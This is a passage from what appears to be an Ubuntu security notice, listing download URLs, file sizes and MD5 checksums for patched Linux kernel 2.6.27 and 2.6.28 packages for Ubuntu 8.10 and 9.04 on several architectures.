http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    33948 74da15b4b68dc6a03f2da65175b021bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   244732 aee21df42a017731c52c53100cbf2f20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    55398 f4d1c18a70aec1e3e39572c36318115c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    41206 42a8188a1ad868fa58aa779b31908d65
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    48698 7e06c0fbdb39f426e1259d35e8f1505e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    86942 49099dad48131ce191b10c154f096d6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    34064 c8cf2cb88451687abb047df2faae44f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   675492 3e953f324652ef7a01f93aeaa2dc5e55
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   158402 aa593e2736e7b717ea8c561b1e11c27b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    43624 b2ca8774a7cf447123ea811781e80dbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   145226 0fbb95dc0bc59baf91447250f19e7d45
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   302390 991c8e4ef2dda71d6deda5599129a768
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  2436572 4b845d0a28c2b48ad0c29521bae3a0b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb
  Size/MD5:   645046 28f8ea5f653057c350d40feb64d68f2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb
  Size/MD5:   645340 a4d347f729beffbf9ff1701d21a5f9b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb
  Size/MD5: 23499764 59f3275c547e9f13f97eba55955725f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb
  Size/MD5: 23635906 c096ba5db0db8b87f67309a9e9c6ff5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb
  Size/MD5: 10117090 7e1648c7b3a3ab2606263ecb20683ba1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb
  Size/MD5:   675850 3e91710602fec2d4aebafe62a6cdfe80
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   433078 d1439530f50069f41b4c30b010871b4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   171298 68b786d8853574467c792efe3fa62ca5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   264104 3a49c641e4a146fdb634b298c51ca6e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  1994518 105c6b0fb8b650949da502f3fee2018d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   150964 dc4178cced6d9c1823d24b2204c15ae9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   184058 a25940b16b7022a52f7b8c78e164a908
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   157856 c628cef1c909819dab1fe2d812dffeba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    34500 2ea55d8e77aa3065af30ff4d440c059d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    78286 6d0f7704cdff848dbbfbd5fe60cf0ca7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    86190 c7d8ec25c3d35ea8455e9cf7c1b4ec64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    51332 79b56b5e7f79a17d45fb7c55f64954b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:     8796 e571105caa3bed5fc3576928b03eff31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    64316 bcb0f12340567e9db7a5dcc3549dcf0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   102092 a2556a5171c52abe48ba423b008c6f13
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  1450234 339572f5e579468fc438b1dd2cc2dcd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    44520 68267a8c684d01c673d4b41bf5d4af69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    12642 80e228567fcb814cd67e54aec6abdb41
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   373158 483599df2e1b6c82a688b413b74e5b91
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   189720 156d822da222b7fc8b887a4d1b3b7c31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    12992 7232aad22eb02ec694fa0d41d367a69c

Updated packages for Ubuntu 9.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz
  Size/MD5:  7350773 c09bf21927b9609694b39cdd55af21cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc
  Size/MD5:     3198 5ba9f01bd70b951901d1d1667b964b54
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz
  Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb
  Size/MD5:  3636694 05fda32db7067b32c0fe593e1acf0533
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb
  Size/MD5:  8701396 65f8df38ba832ad50c6486d22420efca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb
  Size/MD5: 56998214 3d33148ef29824c1060e1f66b470c6c4

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   234600 929bceffa24f85104c08edf073ac1f0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    44110 6d94c9d8ecfe3b4673d25cce1db2b95b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    43316 d895b0ad91a70c9381fd7e17650fab75
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    51116 da4c61dc01f5b5e8fb61cdf14bbbb40a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    90082 dad217572b5b07064b9e12b0062d16b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    38016 5e886058b306b4937f5a4ebe22451db6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   521628 d9f3ffe45b307847935002619ac31ea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   125818 6fbc3c76a739b91e01da41bd535f3791
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    58060 cc30f23edae38f46b0d56f621969fd62
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   312502 9a11c9f0f37fee6a92c59de9df5fca11
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  3872142 cdc4640244b192a5970dfc3d3efe4d7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb
  Size/MD5:   689228 bf7aedb2bbb365a73ed77a8976a2701e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb
  Size/MD5:   689122 80cfc63043a2d7231f86ef3e68f0a131
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb
  Size/MD5: 24344078 dca923a8044df0ba9c642d5f2b317867
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb
  Size/MD5: 24335914 ad5a4fe70b4555e9399f9a45b58459f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb
  Size/MD5: 10551276 b61ed90bb3d3f19f0d2e593c0e9f091a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb
  Size/MD5:   766282 f86ee0c95591ea10b578e848b6fdeb5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   215170 7939440a8813110d952d86b49113e146
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   189496 f7495840a58b11f4ebfaad4d8cf203fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    29412 54845dbae313e98befcc172b5e87ac2c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   274480 e029f99b6550bd014f26c45997f76dcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  1933908 6fa450fb440effd7f4a1d643f5e80ab9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   163464 208a84b0506fcd9cadb25f1b7f9d26b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   194828 596399bbfa9a92e3116c8f8d3a7d1391
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   152994 3cf4fb6614c5798cdcca7c8d7fd04a5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    36486 b3cf4deb0dc4e11f095eb9bcf81546df
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:     5842 085134ad282a8b2580aa12a6ed64fd9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    72152 5b6bf270db5279c7d79cbd5fca8e14f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    22714 a01ded50b855c5ed0580072a2277b74a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:     8874 f173072403f51e6e6da399debd91068f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    47442 e822623d7e4ae0bec0ea5094fed67dcf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    15656 2b2e6ad08af592fa3106adb4eb16324e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  1273594 d873a895c58da3fcd5b8a0ea91f9a5ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    47204 c80f48bd49fddaae0188cf56350445f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    72706 dcc76877eef3af00d0280f96cafb6e45
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   126958 b184498c9d2a598d57e293bc09049cda
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    13472 1399e0100a81d92448659b83949a62a6

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   215860 fe00a3406a5496e200d5c4e5975469f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    46662 d7a61d1e363f9766795132d3325f02c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    41352 7d84e783cf7fc4111eaf964395440369
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    47402 2cd024da2955f7e35fe4519c8df5add5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    86924 515a3a07357e06f49b2e4384e2af7b8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    33578 452adbbc84f5a5218610ddad25eb3ea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   525752 1a2c59458472f4a18538df9386396703
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   125654 8678d7c3409daf24a373b4d11a0d9263
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    54874 94d4465b06d14b20af5803f2afddf53d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   301338 64a58b9a7ee5d53c2d1a486fe32deb93
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  3746292 099947b9ddfb625da14b96bf1b9f59e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb
  Size/MD5:   673824 c36739d12d66db8de4b6e270b1c91464
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb
  Size/MD5:   676398 c7091523d59d0b1cdd4453e12d5983d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb
  Size/MD5: 24662186 cfa5f52488fb3767debfefaf8940f6b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb
  Size/MD5: 24777004 b524e2b45df5e9d30ebc81717b5c62d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb
  Size/MD5: 10250016 09b9af49da34304c1dd280896ce9c0cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb
  Size/MD5:   766288 4858bc3941dc0e545195c0b911142a4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   218106 f4f03360ad8e2ee23a58b534e8a2c045
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   174922 fbc6643612c01e91066a87b6ec9c7125
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    30064 c8e4db00aa9c0c3b75c47c103d87b4c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   262814 794c683379e359de14db8806fe984f78
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  2110070 da3e69dab278584e1abea5ee15d9b47d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   150230 7fc91b8ad535bfb705ba2cb2fc9ff57d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   184326 e505e555ac3bd0c33d00a47f7530f78c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   143584 209207f7e7887594a9d55d17bf1dca76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    34576 cafc0f5f2db11f69d10e75815d3e9018
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:     5504 21cfbb5c1aa4c8d82bf3e1412646263f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    86018 0dc7720bee90887f4ebf5c71cf93d611
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    47636 fbebe71b83526192c08fd6d797ee8cb1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:     8714 14ed52e8c0a75151dd45acf3cb1ffc34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    44692 27502a17d5ca35cc31a9fd79ae7d2f1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    14780 2c9ea91e8d8da2bff76c38a6cdce748d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  1445966 33fa2ee03c566924552fc5b413e2ccf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    44098 f740dcb377a692e2ff25a65424431e5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    69290 a7e3130530005bf8fe4edabe8b003888
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   119528 a12c1a5bf9a112402d80e8f77ee87a1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    12678 6646096dee2575f3bb33510e70bdd52b

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   215260 9a096eefa7f5e423c60fea41c314b9a5
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    46664 ba3b534d98d6717395ec66b402b3c701
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    40958 5950f34ca1fbd16f82a42020bc934ec6
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    47312 0d7d48294720bbd387710d560756ce6a
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    86530 9e5c38cd42496250d5fcf951c6b5d4bd
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    33272 a8890faa31cf92122bcce2991374fe7e
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   523810 7b2a58ca4d024926c0f8101ab49242d6
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   125252 f48299cd45e2ef1a74017d1c7653976e
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    63568 135fe854fe31d2d8bd9cd09f40a266e5
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   300756 77668125ff976eaed45f3d2676a46c5f
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  3035296 186cc64995c4fd4404241de5399eb0fb
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb
  Size/MD5:   641460 1a4d29b73378acb8bcf88658f88dd08e
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb
  Size/MD5: 21796372 d7455e818bf972ef7eb0fe54b7bd96dc
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb
  Size/MD5:   766260 b67d9c1432185123449ed6826ed9588d
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   303982 80fe6dcf6d68a46047ef6ddc2c098614
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   157406 2cc8f76d83482452bb6073656a80b2ee
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    24442 28180da41edae2700e4c8a0e4f1c656f
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   260414 49a0b6bd418a0ff1d274ce8f602e2733
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  2027576 241ee9a564502f3d8837806d5e6480d0
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   149398 b14f79b842c979418dec65e273836cd0
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   184736 a159624d12831598d35c3b00ba563182
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   143238 2720ae4f8cdad85066fc888e7fc3c796
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    34462 582363a3843fdbded2476793775ace76
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     5496 67c7245d730a7b241eb9947afeef7669
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    85646 6a31ffe0054c27df1506ae34162ab79e
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    47402 ff41a000c4a3abbed18330e905a01b7b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     8718 15aa2d8fafced6b6e3b5a24c698b4089
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    63106 7a967940a04c1ee6a9626258e608b54c
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    14720 dc899d8630769d6270526c49f99a2af8
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  1447832 400eeba1e83569d777954b21b6df593c
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    43898 16b0a1310e3f70dccfc8d0d5f971b064
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   155186 b22b41e37f88fe49531f5580e0f7f712
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   172666 df244ff125096be469b1c56a30f1e05f
